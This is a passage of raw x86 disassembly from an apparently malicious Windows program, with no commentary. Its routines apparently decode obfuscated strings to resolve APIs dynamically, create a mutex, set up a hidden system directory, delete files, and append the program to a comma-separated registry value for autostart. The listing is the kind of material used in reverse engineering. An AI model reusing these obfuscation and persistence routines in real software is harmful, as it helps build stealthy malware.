; ---------------------------------------------------------------------------
loc_41ADD6: ; CODE XREF: sub_41AC39+18C�j
mov eax, [edx+ebx]
mov esi, eax
add edx, 4
mov [ebp+var_4], 1Fh
shr esi, 1Fh
loc_41ADE8: ; CODE XREF: sub_41AC39+19B�j
test esi, esi
jz short loc_41AD85
inc edi
inc edi
loc_41ADEE: ; CODE XREF: sub_41AC39+149�j
mov esi, [ebp+var_8]
mov ecx, 0D00h
cmp ecx, [ebp+var_C]
sbb ecx, ecx
neg ecx
add edi, ecx
mov [ebp+var_18], edi
add edi, esi
cmp edi, [ebp+var_10]
ja short loc_41AE55
cmp [ebp+var_C], esi
ja short loc_41AE86
sub esi, [ebp+var_C]
mov edi, [ebp+arg_8]
add esi, [ebp+arg_8]
mov cl, [esi]
mov [ebp+var_C], esi
mov esi, [ebp+var_8]
inc [ebp+var_8]
inc [ebp+var_C]
mov [esi+edi], cl
loc_41AE28: ; CODE XREF: sub_41AC39+206�j
mov ecx, [ebp+var_C]
mov esi, [ebp+var_8]
inc [ebp+var_8]
mov cl, [ecx]
mov edi, [ebp+arg_8]
inc [ebp+var_C]
dec [ebp+var_18]
mov [esi+edi], cl
jnz short loc_41AE28
jmp loc_41ACA5
; ---------------------------------------------------------------------------
loc_41AE46: ; CODE XREF: sub_41AC39+4A�j
; sub_41AC39+A0�j ...
mov eax, 0FFFFFF37h
loc_41AE4B: ; CODE XREF: sub_41AC39+221�j
; sub_41AC39+228�j
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_C]
mov [edx], ecx
jmp short loc_41AE90
; ---------------------------------------------------------------------------
loc_41AE55: ; CODE XREF: sub_41AC39+56�j
; sub_41AC39+182�j ...
mov eax, 0FFFFFF36h
jmp short loc_41AE4B
; ---------------------------------------------------------------------------
loc_41AE5C: ; CODE XREF: sub_41AC39+AC�j
mov eax, 0FFFFFF35h
jmp short loc_41AE4B
; ---------------------------------------------------------------------------
loc_41AE63: ; CODE XREF: sub_41AC39+F8�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, edx
sub eax, [ebp+arg_4]
cmp edx, [ebp+arg_4]
sbb ecx, ecx
and ecx, 0FFFFFFFCh
add ecx, 0FFFFFF37h
neg eax
sbb eax, eax
and eax, ecx
jmp short loc_41AE90
; ---------------------------------------------------------------------------
loc_41AE86: ; CODE XREF: sub_41AC39+1D3�j
mov eax, [ebp+arg_C]
mov [eax], esi
mov eax, 0FFFFFF35h
loc_41AE90: ; CODE XREF: sub_41AC39+21A�j
; sub_41AC39+24B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41AC39 endp
; =============== S U B R O U T I N E =======================================
sub_41AE95 proc near ; CODE XREF: sub_417F0B+28�p
; sub_417F0B+54�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor ecx, ecx
xor al, al
cmp [esi], cl
push edi
mov edi, [esp+8+arg_4]
jle short loc_41AEC3
mov dl, 0BAh
push ebx
loc_41AEAA: ; CODE XREF: sub_41AE95+2B�j
mov bl, [ecx+esi+1]
add bl, dl
inc al
mov [ecx+edi], bl
movsx ebx, byte ptr [esi]
movzx ecx, al
add dl, 2
cmp ecx, ebx
jl short loc_41AEAA
pop ebx
loc_41AEC3: ; CODE XREF: sub_41AE95+10�j
movzx eax, al
mov byte ptr [eax+edi], 0
mov eax, edi
pop edi
pop esi
retn
sub_41AE95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AECF proc near ; CODE XREF: sub_41BA7B+C�p
; sub_41BA7B+2C�p ...
var_34 = byte ptr -34h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_41AE95
pop ecx
pop ecx
push eax
call dword_40FD08 ; LoadLibraryA
mov ebx, eax
xor edi, edi
cmp ebx, edi
jz short loc_41AF29
cmp [ebp+arg_8], di
jbe short loc_41AF29
loc_41AEFB: ; CODE XREF: sub_41AECF+58�j
mov ecx, [ebp+arg_4]
movzx eax, di
lea esi, [ecx+eax*8]
lea eax, [ebp+var_34]
push eax
push dword ptr [esi]
call sub_41AE95
pop ecx
pop ecx
push eax
push ebx
call dword_40FD04 ; GetProcAddress
test eax, eax
jz short loc_41AF30
mov ecx, [esi+4]
inc edi
cmp di, [ebp+arg_8]
mov [ecx], eax
jb short loc_41AEFB
loc_41AF29: ; CODE XREF: sub_41AECF+24�j
; sub_41AECF+2A�j
mov eax, ebx
loc_41AF2B: ; CODE XREF: sub_41AECF+63�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41AF30: ; CODE XREF: sub_41AECF+4C�j
xor eax, eax
jmp short loc_41AF2B
sub_41AECF endp
; =============== S U B R O U T I N E =======================================
sub_41AF34 proc near ; CODE XREF: sub_41B9E9+3C�p
; sub_41CAA9+1A3�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, [esp+8+arg_8]
test esi, esi
jnz short loc_41AF48
lea esi, [esp+8+arg_0]
jmp short loc_41AF63
; ---------------------------------------------------------------------------
loc_41AF48: ; CODE XREF: sub_41AF34+C�j
push ebx
call sub_41A81F
test eax, eax
pop ecx
mov [esi], eax
jz short loc_41AF92
push ebx
push [esp+0Ch+arg_0]
push eax
call sub_41A857
add esp, 0Ch
loc_41AF63: ; CODE XREF: sub_41AF34+12�j
xor eax, eax
test ebx, ebx
jbe short loc_41AF90
push edi
loc_41AF6A: ; CODE XREF: sub_41AF34+59�j
test al, 1
mov ecx, [esi]
jnz short loc_41AF7F
lea edi, [ecx+eax]
mov cl, al
add cl, cl
mov dl, 0F6h
sub dl, cl
add [edi], dl
jmp short loc_41AF8A
; ---------------------------------------------------------------------------
loc_41AF7F: ; CODE XREF: sub_41AF34+3A�j
mov dl, al
add dl, dl
add ecx, eax
add dl, 7
add [ecx], dl
loc_41AF8A: ; CODE XREF: sub_41AF34+49�j
inc eax
cmp eax, ebx
jb short loc_41AF6A
pop edi
loc_41AF90: ; CODE XREF: sub_41AF34+33�j
mov eax, ebx
loc_41AF92: ; CODE XREF: sub_41AF34+1F�j
pop esi
pop ebx
retn
sub_41AF34 endp
; =============== S U B R O U T I N E =======================================
sub_41AF95 proc near ; CODE XREF: sub_414B1B+C1�p
; .data:00414EB5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, [esp+8+arg_8]
test esi, esi
jnz short loc_41AFA9
lea esi, [esp+8+arg_0]
jmp short loc_41AFC7
; ---------------------------------------------------------------------------
loc_41AFA9: ; CODE XREF: sub_41AF95+C�j
lea eax, [ebx+10h]
push eax
call sub_41A81F
test eax, eax
pop ecx
mov [esi], eax
jz short loc_41AFF6
push ebx
push [esp+0Ch+arg_0]
push eax
call sub_41A857
add esp, 0Ch
loc_41AFC7: ; CODE XREF: sub_41AF95+12�j
xor eax, eax
test ebx, ebx
jbe short loc_41AFF4
push edi
loc_41AFCE: ; CODE XREF: sub_41AF95+5C�j
test al, 1
mov ecx, [esi]
jnz short loc_41AFE1
mov dl, al
add dl, 5
add ecx, eax
add dl, dl
add [ecx], dl
jmp short loc_41AFEE
; ---------------------------------------------------------------------------
loc_41AFE1: ; CODE XREF: sub_41AF95+3D�j
lea edi, [ecx+eax]
mov cl, al
add cl, cl
mov dl, 0F9h
sub dl, cl
add [edi], dl
loc_41AFEE: ; CODE XREF: sub_41AF95+4A�j
inc eax
cmp eax, ebx
jb short loc_41AFCE
pop edi
loc_41AFF4: ; CODE XREF: sub_41AF95+36�j
mov eax, ebx
loc_41AFF6: ; CODE XREF: sub_41AF95+22�j
pop esi
pop ebx
retn
sub_41AF95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AFF9 proc near ; CODE XREF: sub_414B1B+E4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, 4
ja short loc_41B009
xor eax, eax
jmp short loc_41B04F
; ---------------------------------------------------------------------------
loc_41B009: ; CODE XREF: sub_41AFF9+A�j
push esi
mov esi, [ebp+arg_0]
mov eax, [esi]
push edi
push eax
mov [ebp+arg_4], eax
call sub_41A81F
test eax, eax
mov edi, [ebp+arg_8]
pop ecx
mov [edi], eax
jz short loc_41B04B
lea ecx, [ebp+arg_4]
push ecx
push eax
add ebx, 0FFFFFFFCh
push ebx
add esi, 4
push esi
call sub_41AC39
add esp, 10h
test eax, eax
jnz short loc_41B043
mov eax, [ebp+arg_4]
test eax, eax
jnz short loc_41B04D
loc_41B043: ; CODE XREF: sub_41AFF9+41�j
push dword ptr [edi]
call sub_41A83D
pop ecx
loc_41B04B: ; CODE XREF: sub_41AFF9+28�j
xor eax, eax
loc_41B04D: ; CODE XREF: sub_41AFF9+48�j
pop edi
pop esi
loc_41B04F: ; CODE XREF: sub_41AFF9+E�j
pop ebx
pop ebp
retn
sub_41AFF9 endp
; =============== S U B R O U T I N E =======================================
sub_41B052 proc near ; CODE XREF: sub_414C49+64�p
; sub_414C49+BB�p ...
arg_0 = dword ptr 4
push 20h
push [esp+4+arg_0]
call dword_40FDB4 ; SetFileAttributesW
push [esp+arg_0]
call dword_40FDB0 ; DeleteFileW
test eax, eax
setnz al
retn
sub_41B052 endp
; =============== S U B R O U T I N E =======================================
sub_41B06E proc near ; CODE XREF: sub_414A0E+A�p
; sub_414C49+78�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
push 0
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
mov esi, eax
push 0FFFFFFFFh
push esi
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_41B0A1
cmp eax, 80h
jz short loc_41B0A1
push esi
call dword_40FDAC ; CloseHandle
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B0A1: ; CODE XREF: sub_41B06E+1F�j
; sub_41B06E+26�j
mov eax, esi
pop esi
retn
sub_41B06E endp
; =============== S U B R O U T I N E =======================================
sub_41B0A5 proc near ; CODE XREF: sub_414A0E+78�p
; sub_414AD3+2C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_40FD84 ; ReleaseMutex
push [esp+arg_0]
call dword_40FDAC ; CloseHandle
retn
sub_41B0A5 endp
; =============== S U B R O U T I N E =======================================
sub_41B0BA proc near ; CODE XREF: .data:0041697E�p
; .data:004169AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_40FDE8 ; GetTickCount
cmp dword_40FEBC, eax
jz short loc_41B0CF
mov dword_40FEBC, eax
jmp short loc_41B0D4
; ---------------------------------------------------------------------------
loc_41B0CF: ; CODE XREF: sub_41B0BA+C�j
mov eax, dword_40FEB8
loc_41B0D4: ; CODE XREF: sub_41B0BA+13�j
mov ecx, [esp+arg_4]
imul eax, 343FDh
sub ecx, [esp+arg_0]
add eax, 269EC3h
inc ecx
mov dword_40FEB8, eax
jz short locret_41B0F9
xor edx, edx
div ecx
mov eax, edx
add eax, [esp+arg_0]
locret_41B0F9: ; CODE XREF: sub_41B0BA+33�j
retn
sub_41B0BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0FA proc near ; CODE XREF: sub_415FD3+19�p
; sub_41CFA9+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov al, [ebp+arg_C]
push ebx
push esi
xor ebx, ebx
push ebx
neg al
push ebx
push [ebp+arg_8]
push ebx
push 1
sbb eax, eax
and eax, 40000000h
or eax, 80000000h
push eax
push [ebp+arg_0]
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_4]
mov [esi+8], eax
jz short loc_41B1AA
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_40FD40 ; GetFileSizeEx
test eax, eax
jz short loc_41B1A1
cmp [ebp+var_4], ebx
jnz short loc_41B1A1
mov eax, [ebp+var_8]
cmp eax, ebx
mov [esi+4], eax
jnz short loc_41B158
mov [esi+0Ch], ebx
mov [esi], ebx
loc_41B154: ; CODE XREF: sub_41B0FA+9C�j
mov al, 1
jmp short loc_41B1AC
; ---------------------------------------------------------------------------
loc_41B158: ; CODE XREF: sub_41B0FA+53�j
xor eax, eax
cmp [ebp+arg_C], bl
push ebx
setnz al
push ebx
push ebx
lea eax, [eax+eax+2]
push eax
push ebx
push dword ptr [esi+8]
call dword_40FD44 ; CreateFileMappingW
cmp eax, ebx
mov [esi+0Ch], eax
jz short loc_41B1A1
push dword ptr [esi+4]
xor ecx, ecx
cmp [ebp+arg_C], bl
push ebx
setz cl
push ebx
lea ecx, [ecx+ecx+2]
push ecx
push eax
call dword_40FD48 ; MapViewOfFile
cmp eax, ebx
mov [esi], eax
jnz short loc_41B154
push dword ptr [esi+0Ch]
call dword_40FDAC ; CloseHandle
loc_41B1A1: ; CODE XREF: sub_41B0FA+44�j
; sub_41B0FA+49�j ...
push dword ptr [esi+8]
call dword_40FDAC ; CloseHandle
loc_41B1AA: ; CODE XREF: sub_41B0FA+35�j
xor al, al
loc_41B1AC: ; CODE XREF: sub_41B0FA+5C�j
pop esi
pop ebx
leave
retn
sub_41B0FA endp
; =============== S U B R O U T I N E =======================================
sub_41B1B0 proc near ; CODE XREF: sub_415FD3+158�p
; sub_41CFA9+33�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
test eax, eax
jz short loc_41B1C2
push eax
call dword_40FD4C ; UnmapViewOfFile
loc_41B1C2: ; CODE XREF: sub_41B1B0+9�j
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41B1D0
push eax
call dword_40FDAC ; CloseHandle
loc_41B1D0: ; CODE XREF: sub_41B1B0+17�j
mov esi, [esi+8]
test esi, esi
jz short loc_41B1DE
push esi
call dword_40FDAC ; CloseHandle
loc_41B1DE: ; CODE XREF: sub_41B1B0+25�j
pop esi
retn
sub_41B1B0 endp
; =============== S U B R O U T I N E =======================================
sub_41B1E0 proc near ; CODE XREF: sub_4149C6+10�p
; sub_41B208+10�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and word ptr [eax], 0
mov ecx, dword_40FC20
and cl, 1
neg cl
push 1
sbb ecx, ecx
and ecx, 0FFFFFFF5h
add ecx, 25h
push ecx
push eax
push 0
call dword_40FBA8
retn
sub_41B1E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B208 proc near ; CODE XREF: .data:004159E4�p
var_400 = word ptr -400h
var_3FC = dword ptr -3FCh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push esi
call sub_41B1E0
pop ecx
xor edi, edi
push edi
push 2000000h
push 3
push edi
push 3
push 80000000h
push esi
call dword_40FDC0 ; CreateFileW
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [esi], di
jz short loc_41B291
lea eax, [ebp+arg_0]
push eax
push 400h
lea eax, [ebp+var_400]
push eax
push 1
push ebx
mov [ebp+arg_0], edi
call dword_40FC28
test eax, eax
jnz short loc_41B28A
cmp [ebp+var_400], 104h
jnb short loc_41B28A
movzx eax, [ebp+var_400]
mov ecx, [ebp+var_3FC]
mov [ecx+eax*2], di
push [ebp+var_3FC]
push esi
call dword_40FD98 ; lstrcpyW
loc_41B28A: ; CODE XREF: sub_41B208+57�j
; sub_41B208+62�j
push ebx
call dword_40FDAC ; CloseHandle
loc_41B291: ; CODE XREF: sub_41B208+37�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B208 endp
; =============== S U B R O U T I N E =======================================
sub_41B296 proc near ; CODE XREF: .data:004168E3�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41B1E0
mov eax, dword_40FB34
pop ecx
push dword ptr [eax+0Ch]
push esi
push esi
call dword_40FC8C
pop esi
retn
sub_41B296 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2B4 proc near ; CODE XREF: .data:004157C3�p
; sub_4183BE+1C�p ...
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call dword_40FE5C ; GetProcessTimes
push [ebp+arg_8]
mov eax, dword_40FB34
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+var_8]
push dword ptr [eax+60h]
push 104h
push [ebp+arg_C]
call dword_40FC84
add esp, 1Ch
leave
retn
sub_41B2B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2FA proc near ; CODE XREF: sub_414C49+181�p
; .data:004186DD�p
var_208 = byte ptr -208h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
lea eax, [ebp+var_208]
push eax
push 104h
call dword_40FE70 ; GetTempPathW
push [ebp+arg_0]
lea eax, [ebp+var_208]
push 0
push offset dword_403180
push eax
call dword_40FE90 ; GetTempFileNameW
leave
retn
sub_41B2FA endp
; =============== S U B R O U T I N E =======================================
sub_41B32E proc near ; CODE XREF: sub_4180AB+2D�p
; sub_41BFC6+26�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ebx
and esi, 0FFFF0000h
push edi
jz short loc_41B386
loc_41B33F: ; CODE XREF: sub_41B32E+56�j
push 40h
push esi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_41B37E
cmp word ptr [esi], 5A4Dh
jnz short loc_41B37E
mov eax, [esi+3Ch]
lea edi, [eax+esi]
cmp edi, ebx
ja short loc_41B37E
push 0F8h
push edi
call dword_40FE74 ; IsBadReadPtr
test eax, eax
jnz short loc_41B37E
cmp dword ptr [edi], 4550h
jnz short loc_41B37E
mov eax, [edi+50h]
add eax, esi
cmp eax, ebx
ja short loc_41B38C
loc_41B37E: ; CODE XREF: sub_41B32E+1C�j
; sub_41B32E+23�j ...
sub esi, 10000h
jnz short loc_41B33F
loc_41B386: ; CODE XREF: sub_41B32E+F�j
xor eax, eax
loc_41B388: ; CODE XREF: sub_41B32E+60�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41B38C: ; CODE XREF: sub_41B32E+4E�j
mov eax, esi
jmp short loc_41B388
sub_41B32E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B390 proc near ; CODE XREF: sub_414C49+A�p
; sub_41CAA9+1B9�p ...
var_208 = byte ptr -208h
push ebp
mov ebp, esp
lea eax, [ebp+var_208]
sub esp, 208h
push eax
call sub_41B1E0
mov eax, dword_40FB34
pop ecx
push dword ptr [eax]
lea eax, [ebp+var_208]
push eax
push eax
call dword_40FC8C
push 0
lea eax, [ebp+var_208]
push eax
call dword_40FE6C ; CreateDirectoryW
push 6
lea eax, [ebp+var_208]
push eax
call dword_40FDB4 ; SetFileAttributesW
leave
retn
sub_41B390 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3DB proc near ; CODE XREF: .data:0041690C�p
; .data:00416A7C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
push [ebp+arg_0]
xor bl, bl
call dword_40FD90 ; lstrlenW
xor esi, esi
push esi
mov edi, eax
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push esi
push 3
push esi
push esi
push esi
push dword ptr [eax+48h]
mov [ebp+var_C], edi
push 80000002h
call dword_40FBE0
test eax, eax
jnz loc_41B51F
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push esi
push esi
push esi
mov [ebp+var_8], esi
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBDC
mov eax, [ebp+var_8]
lea eax, [eax+edi*2+0Ah]
push eax
mov [ebp+var_8], eax
call sub_41A81F
mov edi, eax
cmp edi, esi
pop ecx
jz loc_41B50F
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push edi
push esi
push esi
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBDC
mov ebx, edi
mov ecx, edi
loc_41B46E: ; CODE XREF: sub_41B3DB+C7�j
movzx eax, word ptr [ebx]
cmp ax, si
jz short loc_41B47C
cmp ax, 2Ch
jnz short loc_41B49B
loc_41B47C: ; CODE XREF: sub_41B3DB+99�j
mov eax, ebx
sub eax, ecx
sar eax, 1
cmp eax, [ebp+var_C]
jnz short loc_41B498
push [ebp+var_C]
push [ebp+arg_0]
push ecx
call dword_40FC78
test eax, eax
jz short loc_41B4A4
loc_41B498: ; CODE XREF: sub_41B3DB+AA�j
lea ecx, [ebx+2]
loc_41B49B: ; CODE XREF: sub_41B3DB+9F�j
cmp [ebx], si
jz short loc_41B4A8
inc ebx
inc ebx
jmp short loc_41B46E
; ---------------------------------------------------------------------------
loc_41B4A4: ; CODE XREF: sub_41B3DB+BB�j
mov bl, 1
jmp short loc_41B508
; ---------------------------------------------------------------------------
loc_41B4A8: ; CODE XREF: sub_41B3DB+C3�j
push edi
call dword_40FD90 ; lstrlenW
mov esi, eax
test esi, esi
jbe short loc_41B4C4
cmp word ptr [edi+esi*2-2], 2Ch
jz short loc_41B4C4
mov word ptr [edi+esi*2], 2Ch
inc esi
loc_41B4C4: ; CODE XREF: sub_41B3DB+D8�j
; sub_41B3DB+E0�j
push [ebp+arg_0]
lea eax, [edi+esi*2]
push eax
call dword_40FD98 ; lstrcpyW
add esi, [ebp+var_C]
push offset asc_403184 ; ","
lea eax, [edi+esi*2]
push eax
call dword_40FD98 ; lstrcpyW
lea eax, [esi+esi+4]
push eax
mov eax, dword_40FB34
push edi
push 1
push 0
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBE8
mov ebx, eax
neg ebx
sbb bl, bl
inc bl
xor esi, esi
loc_41B508: ; CODE XREF: sub_41B3DB+CB�j
push edi
call sub_41A83D
pop ecx
loc_41B50F: ; CODE XREF: sub_41B3DB+71�j
push [ebp+var_4]
call dword_40FBE4
test bl, bl
jnz short loc_41B568
mov edi, [ebp+var_C]
loc_41B51F: ; CODE XREF: sub_41B3DB+3B�j
push esi
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push esi
push 2
push esi
push esi
push esi
push dword ptr [eax+4Ch]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_41B568
lea eax, [edi+edi+2]
push eax
push [ebp+arg_0]
mov eax, dword_40FB34
push 1
push esi
push dword ptr [eax+50h]
push [ebp+var_4]
call dword_40FBE8
push [ebp+var_4]
mov bl, 1
call dword_40FBE4
loc_41B568: ; CODE XREF: sub_41B3DB+13F�j
; sub_41B3DB+164�j
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
sub_41B3DB endp
; =============== S U B R O U T I N E =======================================
sub_41B56F proc near ; CODE XREF: sub_419939+8D�p
arg_0 = dword ptr 4
mov eax, dword_40FB34
push dword ptr [eax+5Ch]
push [esp+4+arg_0]
call dword_40FD88 ; lstrcmpiW
neg eax
sbb al, al
inc al
retn
sub_41B56F endp
; =============== S U B R O U T I N E =======================================
sub_41B588 proc near ; CODE XREF: sub_418A96+25A�p
; sub_41C56C+2D�p
mov eax, dword_40FB34
push esi
push edi
mov esi, 10000000h
push esi
push 0
push dword ptr [eax+90h]
call dword_40FB04
mov edi, eax
test edi, edi
jz short loc_41B5ED
push edi
call dword_40FB0C
test eax, eax
jz short loc_41B5ED
push edi
call dword_40FB08
mov eax, dword_40FB34
push esi
push 0
push 0
push dword ptr [eax+94h]
call dword_40FB10
mov esi, eax
test esi, esi
jz short loc_41B5ED
push esi
call dword_40FB18
test eax, eax
jz short loc_41B5ED
push esi
call dword_40FB14
mov al, 1
jmp short loc_41B5EF
; ---------------------------------------------------------------------------
loc_41B5ED: ; CODE XREF: sub_41B588+1F�j
; sub_41B588+2A�j ...
xor al, al
loc_41B5EF: ; CODE XREF: sub_41B588+63�j
pop edi
pop esi
retn
sub_41B588 endp
; =============== S U B R O U T I N E =======================================
sub_41B5F2 proc near ; CODE XREF: .data:00418A5E�p
; .data:0041965F�p
push esi
push 2
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
mov eax, dword_40FB34
push dword ptr [eax+54h]
push 80000001h
call dword_40FCA0
mov eax, dword_40FB34
push dword ptr [eax+54h]
mov esi, 80000002h
push esi
call dword_40FCA0
mov eax, dword_40FB34
push dword ptr [eax+58h]
push esi
call dword_40FCA0
push 3E8h
call dword_40FD68 ; Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, dword_40FB34
push 0Eh
push dword ptr [eax+30h]
call sub_41AAD0
add esp, 18h
pop esi
retn
sub_41B5F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B65D proc near ; CODE XREF: sub_41C395+172�p
var_214 = byte ptr -214h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 214h
push ebx
lea eax, [ebp+var_8]
push eax
push 8
push [ebp+arg_0]
xor ebx, ebx
call dword_40FBD0
test eax, eax
jz short loc_41B6F4
push esi
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push 1
push [ebp+var_8]
mov [ebp+var_4], ebx
call dword_40FBD4
push [ebp+var_4]
call sub_41A81F
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_41B6EA
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push esi
push 1
push [ebp+var_8]
call dword_40FBD4
test eax, eax
jz short loc_41B6E3
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov [ebp+var_4], 103h
push dword ptr [esi]
push ebx
call dword_40FBD8
test eax, eax
jz short loc_41B6E3
mov bl, 1
loc_41B6E3: ; CODE XREF: sub_41B65D+58�j
; sub_41B65D+82�j
push esi
call sub_41A83D
pop ecx
loc_41B6EA: ; CODE XREF: sub_41B65D+41�j
push [ebp+var_8]
call dword_40FDAC ; CloseHandle
pop esi
loc_41B6F4: ; CODE XREF: sub_41B65D+1D�j
mov al, bl
pop ebx
leave
retn
sub_41B65D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B6F9 proc near ; CODE XREF: .data:0041888F�p
; sub_41DCA5+1FA�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 0F0000060h
push 1
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_10]
push eax
mov [ebp+var_1], bl
call dword_40FC04
test eax, eax
jz short loc_41B783
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push 8003h
push [ebp+var_10]
call dword_40FC08
test eax, eax
jz short loc_41B779
push ebx
push [ebp+arg_8]
mov [ebp+var_C], 10h
push [ebp+arg_4]
push [ebp+var_8]
call dword_40FC0C
test eax, eax
jz short loc_41B770
push ebx
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
push 2
push [ebp+var_8]
call dword_40FC10
test eax, eax
jz short loc_41B770
cmp [ebp+var_C], 10h
jnz short loc_41B770
mov [ebp+var_1], 1
loc_41B770: ; CODE XREF: sub_41B6F9+54�j
; sub_41B6F9+6B�j ...
push [ebp+var_8]
call dword_40FC14
loc_41B779: ; CODE XREF: sub_41B6F9+39�j
push ebx
push [ebp+var_10]
call dword_40FC18
loc_41B783: ; CODE XREF: sub_41B6F9+21�j
mov al, [ebp+var_1]
pop ebx
leave
retn
sub_41B6F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B789 proc near ; CODE XREF: sub_41504B+22�p
; sub_419C1A+78�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
lea ecx, [ebp+var_4]
push ecx
push eax
push [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+arg_0]
push eax
push eax
call dword_40FE10 ; CreateThread
push eax
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_4]
leave
retn
sub_41B789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7B1 proc near ; CODE XREF: sub_416137+150�p
; sub_41B7B1+B1�p
var_458 = byte ptr -458h
var_250 = dword ptr -250h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = word ptr -220h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 458h
push esi
push edi
push offset dword_40103C
push [ebp+arg_0]
lea eax, [ebp+var_458]
push eax
call dword_40FC8C
